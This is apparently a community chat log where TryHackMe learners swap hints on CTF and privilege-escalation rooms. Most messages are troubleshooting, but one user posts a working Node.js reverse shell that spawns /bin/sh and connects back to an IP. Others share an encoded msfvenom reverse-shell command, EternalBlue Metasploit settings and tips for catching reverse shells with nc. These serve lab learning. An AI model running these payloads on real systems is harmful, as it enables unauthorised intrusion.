#room-hints
1 messages · Page 6 of 1
there is a video on the official website that will show you exactly how it needs to be used. it is a bit different
hint is that you need to extract it. and extraction is a bit different
don't rush. slow yourself down
AAAAAAAAAAAAAAAAAAAAAA
Too much going on already
idk i can't understand
Yes Thats it
ok... so you did sudo apt-get install borgbackup ?
I did use the command borg extract archive.tar
and it didn't work
it needs a repo
idk if i need to create one
ok. how did you use command
Help
it worked
but i cant see where did the output file
xDDD
there's a lock.exclusive
what's that
Wait can u help me?
i did borg extract /root:archive.txt
how did you run command?
.
not like that
list first?
might I DM you, to not spoil here
Sure
It needs to be pointed to a particular path which you will find when you extract the contents of the tar file. I only completed this room recently as well.
I finished it Ty
Gave +1 Rep to @tropic garden
I have a few questions on https://tryhackme.com/room/linprivesc# task 10. I was able to complete the task but I would like it if someone could help explain a couple of things to me. After I ran the find command to find where I had write access, why do I not have write access in the usr directory or its sub folders even though it is listed in the command output, and why do I echo "/bin/bash" into a file called thm instead of using vim or nano to write the same thing?
I am on https://tryhackme.com/room/linprivesc# and I am having some trouble on task 11. When I try and mount one of the no_root_squash shares I get an error: mount.nfs: failed to apply fstab options
This is the command I am using: mount -o rw 10.10.234.113:/backup /tmp/backupsonattackermachine
mount.nfs: failed to apply fstab options
Is this still unsolved?
Anyone here ?
If you have a question, you'll get an answer faster if you just ask.
I am trying it again now
Could someone explain why I got this error
Unable to create directory /home/karen/.local/share/nano/: No such file or directory It is required for saving/loading search history or cursor positions.
When I used nano on the target machine of task 10 in Linux priv escalation.
I was typing in nano then all of a sudden it closed and this message displayed
Hello, I'm looking for a hint on https://tryhackme.com/room/volatility.
I am using the "Volatility Sandbox v3.8" machine, which comes with volatility & the dumps already there.
Task 10 asks to look into a couple of memory dumps. The first memory dump, we're told, has something odd going on with the ip "41.168.5.140" . However, when trying to run the volatility network plugins for a windows dump (windows.netstat & windows.netscan) volatility crashes because the windows version of the dump is not supported. Is there any other windows plugin I should be using to look for an odd connection ?
Yes this is still unresolved
Did you add sudo?
Nope, thank you! It works now
Gave +1 Rep to @lucid junco
I am on https://tryhackme.com/room/linprivesc# and I am having some trouble on task 11. After creating and compiling a script and setting the suid bit, when I try to run it on the target machine I get the error:
$ ./nfs
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)
When I try to compile it on the target machine I get an error that gcc can't be found
2 questions
John and hydra? I reset my Linux, my PC, and am starting from new and I'd like to keep order in it now. Where should hydra and John be installed? In /bin?
your local linux?
Chromebook, as I've been learning everything has been getting messy so I reset and am starting from scratch
you can type whereis hydra in the terminal and it will show you
No lol
Where is the best place to install it at... In my /bin or it's cool to put it in /home/user/John or hydra
Sorry for stupid questions
ah, you installed it manually?
I am right now and hydra
then you can put it in /usr/bin/
Cool. I thought so but I wanted to ask to see if there's a cleaner way to put it so I can use it anywhere
if you can spin up a virtual machine that will be nice also, since all the tools are there
And thank you for responding. I'm trying to get my terminal nice and clean
i don't know how to do that task, the default port of ftp has been changed to 10021
what room is that ?
Net Sec Challenge
in general, you can change the default port of any service to the port you like
and the command you are running might not be correct to run like that
Put in Red as the color of the flag, no dice.
In the room where you are supposed to locate a suspicious I.P. When the room was over you needed to answer what color flag you had gotten for following along. I answered Red, and I thought that was the correct answer.
Please D.M. me if it helps
what room is that
Can I copy/paste it here ?
the thm link room yes
let me check
Alrighty .
flags need to appear to you in the format THM{xxxx} to be a valid solution
Ok, so, did I answer correctly, or what's going on, please?
when you enter the correct ip in the field and Block IP Address, the flag will show to you
Ok.
I've been stumped on this one segment for "months".
I actually quit for a while.
you need to enter the bad ip in the field and block it and the flag will show
try it.
pop-up window didn't show up when you block that ip?
It's not the pop up window.
It's the other part where you need to fill out a question.
what was the question
Let me put something here first.
143.110.250.149
What is the flag that you obtained by following along?
when you answer last question the popup needs to show with correct answer
when you block that ip it will show you the answer
This is what I'm getting.
try that as answer
Ffffffinally.
usually all flags are in that format, so to say
Wait, ugh, do I really need to subscribe?
Please delete this flag, let's not spoil it for others.
@left thunder
Where can I find "freeee"?
it says Free or VIP
Ok, I might try Code Academy.
I really am just starting out, any idea where I should begin ?
Ok, thank you.
I really want to continue learning, but I don't have money at this time.
What would I do ?
do free paths
Ok. brb
google and so on
Room: Operating Systems Security. I cannot get the "su - root" to work under Johnny
any tricks?
I'm trying to do the Blue room again for practice, I have completed it already but now the Nmap script for ms17-010 doesn't give me anything it shows as filtered but before it gave a whole bunch of info. I've terminated and started new THM machines (different IP) but still keeps happening. What could be causing this? I was hoping to practice each step that I did in exact order but just be more efficient.
Wait 5-10 mins.
I've tried on 3 separate days and at different times. I have AdGuard but even when I switched it off it makes no difference. Don't know why it takes over 3 hours for these scans. I'm working through the Nmap course with Chris Greer and David Bombal and don't have these issues, but everyone here says it shouldn't take 3 hours so I don't know.
Attackbox/vm?
Both
What's your syntax?
I'm doing it now again with this syntax: sudo nmap -sS -Pn -A -p- -oN nmap.txt 10.xx.xx.xxx It's taken over 20 min still going. On my own VM 0.26%
Tbf, you're scanning all the ports with the aggressive scan.
I understand, but I've seen other people also do this same scan, and when I scan scanme.nmap.org with all ports it doesn't take 3.5 hours. I should still be able to run the nmap script to check for the ms17 vuln; that's what I did when I first did the challenge and it gave me the info, but now it only ever shows as filtered. I just wish I knew what is causing this. I can try from a different computer but it's strange that it worked the first time.
I tried just scanning the one port and it worked, and then launched the THM attackbox and did the one I've had issues with and it worked now. Maybe it's the THM firewall
Try a normal scan.
Thank you, you were right, it didn't like the aggressive or all-port scan. I was able to do it on the attackbox, but when I try on my personal vm I only get filtered. I'm going to try tomorrow to change my thm openvpn and see if it helps.
Gave +1 Rep to @lucid junco
can somebody tell me how to do task 2?
ah yes that one
I'm doing the "RootMe" ctf. The last question of task 2 asks "What is the hidden directory". Out of all of these directories, which one do I know is the hidden one
there is an exploit for said room on the attackbox if shadow recalls correctly... the 3 from exploit-db never worked for shadow for some reason.... here is the file if you feel like using your own machine for the attack instead:
Thanks
no problem
one day shadow might go back and check if they can figure out how to get the other exploit scripts working
You already have the correct one here. Simply try all of them or look at the format by which you key in the answer.
Oh I see. Thanks mate! I eventually went through them all and found the right sub-directory
Gave +1 Rep to @tropic garden
I am on https://tryhackme.com/room/linprivesc# and I am having some trouble on task 11. After creating and compiling a script and setting the suid bit, when I try to run it on the target machine I get the error:
$ ./nfs
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)
When I try to compile on the target machine using gcc I get an error that the gcc command cannot be found
I am now learning how to build a cross compiler. But any other suggestions are welcome
Not using a compatible linux architecture to create the program? (assuming the target box is x86_64/amd64, and your attackbox is also, it should let you run your simple nfs.c program described in the room)
You can always try making an ELF based exploit using msfvenom.
if you are using your own local kali that might be the issue. try using the THM attack box. it might help
Hi, I am in the Pickle Rick CTF and have fuzzed the directories and files, checked if I can bruteforce ssh and tried scanning for vulnerabilities on the apache httpd server. No luck though, any tips?
You can find the ssh creds.
checking under the hood of the website
In fact, you don't need the SSH
So the first thing I did was checking every page with burp suite, because of the obvious reference but I don't see anything?
Maybe the source
Damn how did I not think of that...
Thanks!
Gave +1 Rep to @lucid junco
So I think I have user and pw but I am getting permission denied on ssh?
When trying ssh <username>@$IP
aha, found something. I guess I didn't fuzz thoroughly enough.
So I tried going at it with a webshell and got this:
Should I try this direction more or am I on the wrong path?
you are on the right path
So I am a bit stuck here
Can anyone help me out?
I guess I need to do a privilege escalation to read the files
Couldn't get anywhere with path or gtfobins
do some quick searching on reverse shell commands
I have also tried a bash revshell
that does not look like a php meterpreter shell command
and yeah the bash revshells tend to be a miss in a lot of situations as it requires it to be run kinda specifically
I crafted a php shell with msfvenom earlier, didn't work though?
look into python reverse shell and catching them with nc
Wow, ok I didn't try out python, python2, python3. That was my mistake. Thanks!
Gave +1 Rep to @alpine kestrel
if it runs linux it most likely has python running somewhere
Good to know!
Made it. Dang, I thought this would be easier but it was pretty tough to be honest. Learned a lot though! Thanks for your help!
Gave +1 Rep to @alpine kestrel
no problem
It is not even that complicated, it is just missing the know-how on certain things which slows you down so so much.
technically the reverse shell part is just one of the easier ways to do it... I think you could technically use other tech to read files using the web command line
but that is just extra learning
Yeah, I will get there at some point. Just gotta keep grinding :))
If you can get a RevSH, it makes life much easier, but yeah. Sometimes you'll be able to get a webshell/RCE but the system or network is configured in a way that prevents you from getting a shell back out. (Maybe you're on a front-end server, and it's communicating with a database on a back-end server with no direct Internet access?)
In that case, you can just treat the RCE as a very slow shell, assuming it gives you feedback.
If it's blind, things get tougher again.
can somebody help me to do task 5 for Linux Privilege Escalation, I don't know how I can do this
Hmm, I have notes, but not questions saved.
Link me to the room?
Hmm, Kernel exploits...
yess
I may not be a ton of help from my current location, but did you select a CVE to attempt?
Which one is it? I'll pull it up from my phone and see if I can understand where you're getting stuck.
CVE-2015-1328
i get it on exploit-db
and now, i can't transfer the exploit(37292.c) to target machine
have you tried using sftp to transfer the file over??? and try and put it in /tmp
What kind of access do you have to the machine right now?
i don't know what is sftp
file transfer protocol using ssh's port, hence called sftp
(Like SCP, uses SecureShell to do a file transfer)
secure file transfer protocol
it lets you get and put files
shadow finds sftp easier to use than scp if you need to move a file to the target if you got an ssh connection
I'm booting the VM now on my system...
But I get the feeling at a glance that you just copy-paste the exploit code into a text file, then run gcc against it on the system.
then again the wget and python web server method is decently easy for most people too
Compile on the victim environment, and run exploit.
go in /tmp on target
tmp is a world read/write place
Finding where you have read/write access in a system is going to be important for a lot of exploits.
And if you compile it in place, it becomes an example of LOL as well
thanks, but now, how can I open the 37292.c, because it is not in python
Look at the screenshot, it shows you everything you need to know
Python as you're familiar with, is a scripting language. The largest difference between such and a Programming language, is compiling.
Python runs without requiring any kind of binary packaging. It remains readable.
C and other such programming languages require "compiling", a process that turns our (relatively) human readable code into machine language.
A common (but not the only) compiler aimed for "C" programs is GCC (Gnu C Compiler)
Call the program "gcc" providing a raw c-file as an argument, and it will generate a.out as above.
You can use, I believe "-o" to define your own output file name.
The output file will be compiled c code (A "binary executable")
I haven't seen any rooms on it yet, but if you want to play around with reverse engineering C code, you can make a program (like my simple hello world above), enable the debugging flag, and then use a decompiler to get out the machine language code (Assembly, or as some refer to it in this instance, disassembly).
Which can give you a better understanding of what the computer is actually doing when it runs the code.
I got it, I used gcc, they could have said in the question about the existence of gcc
I'm lost
any time you see a .c file, that file is written in c and needs to be compiled
Hmm, I wonder if gcc is covered in any of the learning linux rooms.
There are a number of rooms that also include hints that simply say "use google"
90% of actual security work is reading and exploring documentation to put the pieces together
A big part of hacking is
yeah that.
I encourage frequent breaks so as not to burn out.
Some folks here make things look easy, some folks here also eat, breathe, and sleep hacks for the last couple decades.
I know, it's just that for someone who understands English very well, searching the internet is easy, but for me I still have these problems, because I'm from Brazil, but I'm getting better with time.
hi guys
Hi I am trying to download something from a target machine using a python http server
python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
But when I try connect to I get this
Connecting to 10.10.133.37:8000... failed: No route to host.
any suggestions? Is this a problem with my openvpn?
Where are you connecting from.
And what are you connecting to?
Not sure I understand what you mean
I am using a vm and connected to openvpn. I am trying to download a file I made on a machine back to my local one using a http server
Which machine?
I just used scp instead
Does anyone know why the http server did not work?
If SCP works, then there's clearly a route to host.
I assume that was curl or wget that failed to connect?
does somebody know how to connect to windows from kali linux with RDP?
I need help
I'm locked in a lesson of the burp suite
Which button would we choose to send an intercepted request to the target in Burp Proxy?
-> _forward_ **OK**
[Research] What is the default keybind for this?
Note: Assume you are using Windows or Linux (i.e. swap Cmd for Ctrl).
well first you capture a request... then you right click the request... then you check the command to send it to said thingy
I imagine you mean to windows since this is RDP?
xfreerdp is built in and can be launched from the command line.
xfreerdp /u:name /p:pass /v:Target-Address /cert:ignore
There are additional arguments to fine tune the experience, but that should be enough to get you connected to the majority of systems.
If you're like me you'll want to open the command with a nohup and end with &
thankss
hello, I am doing the Sea Surfer room. I already added the subdomain name in the /etc/hosts file, but this still gives the default apache home page.
Should that say seasurfer.thm internal.seasurfer.thm ?
yes
thanks , i think i have to enumerate again
Ah.
Maybe not.
I haven't done this room and didn't realise it was spelt that way.
I assumed you made an error.
that was hint to internal.seasurfer.thm
I'm doing the room windows privilege escalation, and in task 6, it seems to have some kind of error.
Something wrong with the hives you saved I think.
Try dumping them again.
I did this room I think a week or two ago.
I'm finished with the jr penetration tester, but I don't know where I need to go now.
Web Fundamentals is a good choice
And the next ?
Offensive Pentesting
Thankssss
no problem
@white salmon alright
what do you use to access a website
on your computer, you load up a what
what software are they using
to access the website
I prefer 1543% of 7
Hi everyone !
I try to complete the Toss A Coin room, but I'm blocked.
It's a CTF room, I need to find the file root.txt
What I have :
I found an ssh login to the room, I have access to one user (Jaskier) and there are 3 more users (tryhackme, geralt, yen). I successfully accessed the yen user, and in its home directory there is a portal file. I put the file in ghidra to extract the functions from the binary, and the main function is this

```c
void main(void)
{
    setuid(0x3eb);
    setgid(0x3eb);
    puts("I am preparing a portal for you Geralt.");
    system("/bin/echo -n \'It will be ready in about \' && date --date=\'next hour\' -R");
    puts("You just have to wait for it");
    getchar();
    puts("Segmentation fault (core dumped)");
    return;
}
```

0x3eb is 1003 and the group 1003 is for the geralt user.
After running the binary "portal" nothing happens and the gid and uid don't change even after 1 hour,
So I request your help please, thanks a lot!
Is this for TryHackMe?
Yes of course, why ?
Can you link the room?
You want the link of the room ?.
Yes.
Is this a private room?
I'm a French learner at Epitech, so maybe only Epitech members can access it
Ah!
You have an educational account?
I don't know, is it important ?
If this is an educational room, we cannot help with it, regular members won't have access to the room, you'll need to ask your peers/who ever is teaching you, about help with any of their rooms.
And with those details you can't give me some advice?
Sorry I can't help any further.
I'm jealous because I can't do a room based on The Witcher.
Can someone tell me why this command did not work on the wind priv room
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\My%20ssh%20server
Hello, I am trying the new obscured room, I was wondering if someone could give me hint, based on a single word as I am unsure if I should continue my current route or not. (Don't want to spoiler as it is very new, so DM works as well)
Have to wait 72 hours after release.
Ok thanks tim. I am just going to wait. I am pretty sure I am using the intended way of exploit but 3 machine restarts and various tinkering didn't help.
Gave +1 Rep to @hexed crescent
Hi all, I have a problem with the room. I have finished this room, but it's not done.
It's a known issue, they're working on it #1092490706385383524
Hi all, I need some support on completing the upload vulnerabilities room, task 11. I was able to upload a reverse JS shell file with its file extension changed to .jpg (the file extension was changed to jpg to counter the MIME filter on the server); the gobuster scan shows that the file is stored in the /content folder. After these steps, I had set up the netcat listener and tried to launch the shell via the admin page using the command ../content/<filename>, but the page returned an error which says module does not exist. I don't know why this error should be returned by the server as the file upload was successful. Need some help to solve this
can you give me some hints about these questions? Where can I find the answer or smth?
Is this GoBuster?
Can some one help ?
No it's from Networking Services 2 room
Are you in msf?
By changing the file extension, did you append .jpg or changed it all together? Also, did you visit or browse to the directory to see if your upload was successful?
I did a gobuster scan after uploading the shell and confirmed that the file was indeed uploaded in the content folder. The shell was uploaded with a .jpg file extension; this was done by changing the extension in the burp suite intercepted request. All the client side filters were disabled before performing these steps.
I meant if you uploaded it as filename.js.jpg or filename.jpg? I'm not sure if uploading it as filename.jpg would still trigger the reverse shell
I uploaded the shell as filename.jpg
Have you tried filename.js.jpg? And try browsing to it again?
Hey guys, I'm working on the mustacchio room and was wondering if anyone can give me a nudge. I was able to gain access to the admin page in port 6xxx or 5xxx (not in my computer atm) and saw the clue for the user Bxxxx to login to the server via ssh using his key. I wanted to know if I need to supply the correct XML code to output user Bxxxx's private key or should I look somewhere else?
Keep going.
Got it. Thanks!
Gave +1 Rep to @young gulch
will try it out, thanks
Gave +1 Rep to @tropic garden
I'm also working on the EasyPeasy box, and I'm stuck and need a nudge on the part right after bruteforcing the hash.. I've no idea how to use the password that I got or how to proceed. I did directory bruteforcing multiple times using different tools and wordlists, but seem clueless as to what to do next, tried to look for a vulnerability or exploit on the OS (on both Apache and nginx) and still nothing.
check the files available to you
something might be hidden
Will look at those again. Thanks!
Gave +1 Rep to @young gulch
@tropic garden I uploaded the file with the extension as filename.js.jpg. The gobuster scan shows the file is present in the /content dir, but I am not able to launch the shell from the admin page with the command ../content/filename.js.jpg, the error is module does not exist
I managed to complete the room, but had to look at a writeup in the end. What happened was that it didn't occur to me to use the password that I got from the hash even though I was being asked for it when running the command s------e info filename.
Dunno why it didn't though. 
ssh tunneluser@10.50.69.171 -R 8888:thmdc.za.tryhackme.com:80 -L :6666:127.0.0.1:6666 -L:7878:127.0.0.1:7878 -N
task 7, am I meant to know the password for this?
I've set up a listener using metasploit but this command won't run without a password, not too sure
on lateral movement and pivoting task 7 really need some help
What is the content of your reverse shell payload? I'll check and see if I can execute this and get back to you
Might take time though as I am only about to start the room
@tropic garden I used a reverse Java shell code as payload.

```javascript
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(4242, "10.10.38.69", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
```
this is the payload which I used
I'm currently doing steel mountain task 2, part 4 and having a little bit of difficulty with the start. I'm kinda lost on what I should do. My hint is telling me to use metasploit to get a shell. I downloaded the vulnerability from exploit db (previous question), which is a python script that targets a certain IP / Port, and it isn't working either. To run the python script that targets the vulnerability this webserver has, the syntax is "python Exploit.py IP Port" and I'm running that but getting errors. I have a nc listening on the same port. So I figured that the script might not be what I'm supposed to do to get my initial access and started messing with metasploit but feel kinda lost atm. Looking for a little hint please. edit: @ me please if you respond.
Okay, could you share the URL to the exploit-db script/vuln that you're trying to use? Worth putting it in spoiler tags like || URL here ||
Okay, so that exploit is for python2. Are you using that version of python to run it?
you should be able to do search cve-bleh-blah in metasploit to find a metasploit module to attack it
if that is the way you wanna do it
I didn't know you could do that, i'm def not comfortable with metasploit yet
given the way the questions are worded I'm kinda guessing that was the intended path
that or searchsploit
and no I was just running python x ip port
yeah that would probably not work because of python version differences then
okay, so that could be either python2 or python3 depending on what you have installed and configured as the "default" python. If you were to run python you should see if it is either python2 or python3
the last task in that room talks about how you would go about not using metasploit for it
how did you know the version of python is different? I'm not super experienced with that for python
does my reading comprehension suck and I just missed a line or?
A good indicator is knowing the difference between how python2 and python3 looks. At a quick glance, I can see the print statements. `print "HelloWorld"` for example is python2, python3 is `print("Hello World")`
think you can look at the shebang at the top or how the print statements are written but unsure
okay so it's a lack of experience? edit; on my part
Syntax is the biggest one. Python2 will allow what Ben said, python3 will allow it but tell you it's deprecated
you can look at the shebang, but in this case, it just looks for /usr/bin/python which could either be python2 or python3 depending on what you have installed and configured as the "default" in your path
yeah.....
Experience perhaps yeah. Definitely gets easier as you get more familiar with things. It's also just knowing if that makes sense?
yeah
Like in this case, if you're not familiar with python, you're not going to know. Same with any exploit script in any language
must acquire more knowledge
We all start somewhere, you'll be a wizard in no time!
I've coded in python but not nearly enough to know the difference in versions.
I would suggest, if you want to complete the room, and you're not familiar with diagnosing vulnerability scripts or environments, looking for metasploit modules would be a good avenue to go with, and you can research into how these scripts work by learning the language they're written in
thank you all!
You are most welcome!
Gave +1 Rep to @steady stratus
Yup, it's literally just an experience/exposure thing in this case, now you know what to look for! Older scripts such as in this case are likely to be written in python2. There are more signs/syntax you can look at to determine if it's written in python2 or python3, but for me, just looking at the difference between print statements is the quickest
Okay, so in instances I'm using older exploits I might need to be aware of the version of code that the exploit was designed to work with
that makes sense
Precisely that, yup. That and understanding that how you're running it may not be the way it's compatible with
same applies for older and newer exploits
if you're running code that's compatible with an old version of python with a newer version of python, you're gonna have problems. If you're running newer exploits that are compatible with newer versions of python (i.e. python3) with an old version of python (i.e. python2), then you're also going to have problems
It's going to be a case of either:
- re-writing the exploit to be compatible with your environment (not always ideal)
- finding alternative exploits/scripts that are compatible with your environment
- changing your environment or the way you're running the exploit to make it compatible
- knowing how to use virtual environments and pyenv to run specific python versions
- using the exploit from a container like docker
yup ^^^^^
virtual environments exist for ruby too but that is just an extra learning opportunity
probably lua virtual environments out there too but I have not used that yet
sed 's/learning/headache/g'
lol accurate
+rep @alpine kestrel
Gave +1 Rep to @alpine kestrel
+rep @distant grail
Gave +1 Rep to @distant grail
ta, I would rep you for that but
yeah limits
+rep
Gave +1 Rep to @steady stratus
hmm I'm having trouble getting the msfvenom payload to work
|| msfvenom -p windows/shell_reverse_tcp LHOST=10.10.175.117 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe || is the payload the room has me create, but I don't think it's correct. I'm supposed to replace ASCService.exe with my payload and then restart the program, which will trigger my payload, right?
[*] Uploading : /root/ASCService.exe -> ASCService.exe
[-] core_channel_open: Operation failed: The process cannot access the file because it is being used by another process.
Just finished the tomghost room and absolutely loved it. ||The last flag hints that there's a fake zip file. Is there a potential extra task that I can do / easter egg I'm missing? Or am I reading too much into the flag?|| HIGHLY recommend this room, it's excellent.
this was a good room, just did it yesterday - I didn't know you could use a certain tool on an image... had to look at a walkthrough...
Please put hints in spoiler tags || hints here || to not be read by non hints-seekers by accident
done - thanks for the heads up
Gave +1 Rep to @oak summit
Thanks to you too :)
Gave +1 Rep to @lunar inlet
For https://tryhackme.com/room/windowsprivesc20 task 6 why do we need to back up both the system and sam hives
I believe this is because the SAM registry hive contains the account information but this information is encrypted with the SysKey. Syskey is stored in the SYSTEM hive.
Source: https://www.praetorian.com/blog/how-to-detect-and-dump-credentials-from-the-windows-registry/
Hey, has anyone had any luck with the java version required for the You're in a cave room? The web server is returning the serialized object correctly but nc won't pick up a connection when I send it to the 3333 service
hi, I am in the nmap room, task 14. It asked me to do a Xmas scan on the first 999 ports. I did "sudo nmap -vv -sX -p1-999 <ip>" and I got all 999 closed ports. It asks me why, but I couldn't find the answer, can u help me?
"There is a reason given for this -- what is it?
Note: The answer will be in your scan results. Think carefully about which switches to use -- and read the hint before asking for help!"
oh ok, I needed openvpn connection... problem solved
hi, I am trying this room, but got stuck on the admin page. From here, I am guessing it's the place for the XXE payload.
I tried multiple ones, most were basic ones from OWASP and some other resources, but none worked.
A hint for where to look from here would be appreciated, thank you.
https://tryhackme.com/room/mustacchio
I'm stuck in the exact same step myself...
the issue is that we didn't know the basics of XML.
the children tag is used to replace the value in an HTML tag.
if you apply that to the XML code, then you can process the request.
you can pass down the value to name, author and comment.
so you are retrieving info from the system, and passing it down to an element
if you specify that element inside the XML, the value will get passed to that element down to HTML
I'm reading on XML bit by bit, but can't seem to grasp where I am getting it wrong.. I saw the || Example=/auth/dontforget.bak || and playing around the query using the said pattern, but still not getting anything.
you are in the phase of xxe in the admin page right?
Yes, the sample I was referring to is located in the || text/javascript || portion of the source.
but did you see a comment below it, referring to a user?
Yes, I updated my earlier reply so you can check.
I got what you're referring to.
but there is actual "comment" referring to a user in those html
did you see it
<!-- --> this is the comment format in html
Yes, I saw it, but still can't figure out the exact content to put in.
ok
so I assume that you tried a brute force for ssh / put something to log in to barry.
when doing that, you would notice an error in ssh, that it's not "password based authentication".
meaning you will need barry's id_rsa for logging in through ssh.
that id_rsa is our target.
we need to use the XML to retrieve the private key of barry from the machine
for XML, i will give a hint/example.
you have a HTML tag named "place".
and you created an xml with the XML prologue and other necessary tags.
after that in the XML, if you wrote
<place>canada</place>
when you run this/submit it
this value will get passed through as the "place" HTML tag's value
did you get some idea about it?
I did that previously and thus trying to get the || id_rsa key || via that field. Not sure if I'm complicating it too much though.
can you share your xml code?
I'll have to check it tomorrow as it's almost 2AM here.
kind of confused on this; task 2 for abusing windows internals hasn't really explained anything to get the flag
this
Hi Everyone, I am new to this platform. I am trying the Metasploit module. The last question in the section "Scanning" is asking for the password. I tried smb_login and got the password, but out of curiosity I attempted brute forcing using hydra with the given wordlist and it is not able to return any password match. I even tried just passing the correct password; even then hydra says 0 valid passwords. Can anyone tell me why we observe this behaviour?
What was your hydra command?
Hi guys, is there anyone else having issues with the Pyramid of Pain room task 9? The one where you drag and drop the answer onto the pyramid. I thought I was doing it properly and even went back to look at the previous tasks, but when I click check answers it still says "whoops check your answers"
all good solved
Please delete the flag, not to ruin it for other users.
any hints on gatekeeper room
i managed to get user access on machine but idk where to privesc from here
Working on the Metasploit: Exploitation room, is eternalblue supposed to hang on [*] 10.10.183.104:445 - Sending all but last fragment of exploit packet forever?
Did you set the LHOST?
LHOST => 10.13.26.18
msf6 exploit(windows/smb/ms17_010_eternalblue) > setg LPORT 4567
LPORT => 4567
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
I set it to the IP on the corner of my screen (using a kali VM), not sure if that's correct or not
I didn't change the lport.
Have also tried it with the default port
4444
Just got a warning that I'm running low on time despite having ~1:30:00, happened before on the same room
TCP handler is binding fine
EternalBlue is notorious for not working after a few failed attempts.
I'd restart the box.
No.
Not sure if you have already beaten this room but it's best to try and run the exploit with Metasploit correctly the first time. That's the only way I've even managed to exploit eternal blue. It's like a 1 shot exploit or something.
Still nope
Going through the basic room, rootme, and I'm having trouble getting the shell I upload to execute. Anyone able to offer some pointers to get me in the right direction? Thanks.
What is the extension?
Talkin to me?
You asked a question... xD
lol Fair.
Extension to the file I uploaded? *.phtml. I got the site to take the upload successfully. When I set my nc to listen then click the script from /directory, the site just loads the script instead of running it for nc to pickup.
What happens when you start the nc first?
Then upload and click?
$nc -lvnp 4444
listening on [any] 4444 ...
What's your target ip?
Then I click the file form /directory. Then the site loads the script as text instead of executing.
The target IP is the room IP that loads after 60s.
I know what the target is, I'm asking what it actually is. lol
As in, give me the ip. lol
Thought you were confirming how smart I was lol. IP 10.10.26.74
Hmm.
Neg. VM.
You need to use the IP of the tun0 to catch your Rev shell.
So tun0 would be target in the script? Or am I misunderstanding?
It's not the "target"
But what you have is looking like you're trying to connect to port 4444 on the IP of 10.10.24.74
But your tun0 should always be used to catch any reverse shells in THM.
If nc is used to listen, I don't know how to "use" tun0 to catch the shell. Based on my limited understanding, nc is catching it, right?
nc is catching it yes.
But it's listening on your VM, and since it's via THM it will come through the 10.10 subnet.
For example, my tun0 10.1.2.3
┌──(scrubz㉿KoopasCastle)-[~]
└─$ nc -lvp 9001
listening on [any] 9001 ...
nc is listening on 10.1.2.3 (and I'm sure my eth0, someone will correct me if I'm wrong) on port 4444.
As I read that, simply changing to port points the "catch" from eth0 to tun0. I feel like I'm missing something haha.
No, that's it.
How's that work? Why does port # change the receipt IP?
lol At least you're trying. My ignorance doesn't help either. I appreciate the effort.
The easiest way to explain it, is to do it.
have you ever used pentest monkey?
Are you saying I need make nc use my tun0?
Nah.
nc will listen on both interfaces.
Ok. And, no, I've never used pentest monkey
Use that script.
Only change these parts
Set the ip to whatever your tun0 is.
And set a port in the 9000's
Save it as a phtml extension too
Did that. Still nothing. F.
try .php5
No dice. This is the output I get on the VM...
Did you set your NC to 9001 first?
Yup. Set that. Went to site, uploaded. Clicked new file. Got that result on the site. Neg results on nc.
Changed. Uploaded. Set nc. Clicked. No dice.
I wanted to try something, is nc still open?
Did you get a shell?
Yup
Yeah, I think it's the script you're trying
yeah there's something wrong with the script, when you click the upload it should hang instead of showing that text output
did this one yesterday I'll try to find the script I used one sec
That's what I expected. That's what I've seen on vid walkthroughs. Mine wasn't hanging.
That's why I directed you towards pentest monkey.
That one will come in handy for a lot of stuff you need to catch.
I literally copied that, input the required data, and saved. lol
The full script?
Still didn't work
Cat your script for me, and show me the output
there's a preinstalled php revshell on kali if you go to /usr/share/webshells/php, you could try that one
just copy it, change the ip/port values and make the extension .php5
They have a shell now, I uploaded one for them.
To show it can be done.
Now we need to teach them what we used. ๐
I got a shell. I think I figured out what I was doing wrong. Scrubz said "the full script." I only copied the specific lines in the middle with the data points you need to change. I copied the entire thing, saved, upload, nc, click, profit.
/facepalm
oh lmao yeah, you didn't have the <?php tags in that case
It's all a learning experience.
Yea lol. Well, thanks for riding the struggle bus with me y'all. Now I gotta get through the priv escalation.
gl
yee yee
don't feel too bad. last night instead of copying the source code of an exploit from exploit-db, I used wget on the actual web page to send to my local machine. Not realizing that it wasn't giving me the exploit source code, it gave me the web page source code
almost referred to the walkthrough until at the last minute I decided to open the source code and see if I could figure something out and saw that it was HTML
oh lol It happens
Hi, question about Wireshark 3: traffic analysis module
i am on the section HTTP traffic on the user-agent section and they want me to spot the frame number with a minute spelling difference in the user-agent field
but, for the life of me I cannot find it, I have been staring for hours. Can someone nudge me in the right direction
I added the user-agent field as an extra column, but not a single user-agent except for the malicious ones seem misspelled to me, 32 seems off but that's not accepted as the answer, and probably shouldn't be anyways
nvm, found it already lol
I'm in task 22 of OWASP 10-2021; in the final task there is an extra question that is
Going the Extra Mile: There's a way to use SSRF to gain access to the site's admin area. Can you find it?
can someone explain what to do ? I'm curious
Task 8 in windows fundamentals part 1, I don't have a clue, everything I've tried.
||In the Control Panel, change the view to Small icons. What is the last setting in the Control Panel view?||
I just need a hint, as to where to look for it.
I'm just getting redirected to settings page.
Remember the earlier task in the module where you exploited the file download using the url associated with the "Download Resume" button? You can use the same exploit to access the /admin page as localhost. You will need to know how to escape the id at the end to make it work though. Finding how to url encode "#" to escape the id will help. Hope those are enough hints to get you through it.
That's where you need to be
Now change it to small icons
Nothing still, the option is just coming to the taskbar icon settings.
I'm going to have to boot up a machine to see how I did it, my host is different.
You there?
Yup
Use this screen.
I've got my cursor over Network etc.
Just ignore that
What about View By: ?
Oh damn, thank you!
Gave +1 Rep to @lucid junco
is there a bug in easyctf?
i got the second question but its wrong
like I got the answer correctly because I filled in a couple of services I knew after doing an nmap scan
but using the nmap scan i see port 21 and port 80
not port 22
there are 2 ports under 1000 that was correct
so whats up with that
For what is running on the higher port question?
ye
the higher one would be port 80 right
like the higher one of the 2
OH BRUH I got it... it's a bit dumb cuz that's higher than 1000
misunderstood the question there
